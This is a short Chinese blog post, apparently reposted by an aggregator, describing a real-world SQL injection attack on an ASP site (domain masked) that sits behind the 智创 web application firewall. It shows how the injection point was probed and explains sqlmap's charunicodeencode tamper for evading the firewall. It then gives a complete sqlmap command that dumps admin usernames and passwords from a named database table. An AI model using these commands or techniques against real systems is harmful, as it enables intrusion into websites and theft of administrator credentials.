实战绕过智创防火墙sql注入

Posted 飓风网络安全

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实战绕过智创防火墙sql注入相关的知识,希望对你有一定的参考价值。


目标站:http://www.xxxxx.com/
http://www.xxxxx.com/shangmao/artmore.asp?id=48514 存在报错型注入,也存在cookie注入

http://www.xxxxx.com/shangmao/artmore.asp?id=48514\  后面加个\或者“ ‘判断


拿去sqlmap注入,突破注入用tamper脚本下的charunicodeencode.py ,都是编码绕过的,我就用字符串 unicode 编码

Example:   * Input: SELECT FIELD%20FROM TABLE   * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′ 

Requirement:

  • ASP

  • ASP.NET

Tested against:

  • Microsoft SQL Server 2000

  • Microsoft SQL Server 2005

  • mysql 5.1.56

  • PostgreSQL 9.0.3

sqlmap.py -u http://www.xxxxx.com/shangmao/artmore.asp

 --cookie "id=48514" --level 2 -D hunangyxcb_com_2014 -T applenews_admin_info -C

 "adminname,adminpass" --dump --threads=10  --tamper=charunicodeencode.py -v 


参数慢慢去领悟,,,,,




以上是关于实战绕过智创防火墙sql注入的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入绕过防火墙的9种基本方法

SQL注入最易懂教程(12.WAF绕过原理)

实战绕过两层waf完成sql注入

项目实战 | 报错SQL注入绕过WAF

SQL注入 | 9种绕过Web应用程序防火墙的方式

新型攻击手法:利用XSS绕过WAF进行SQL注入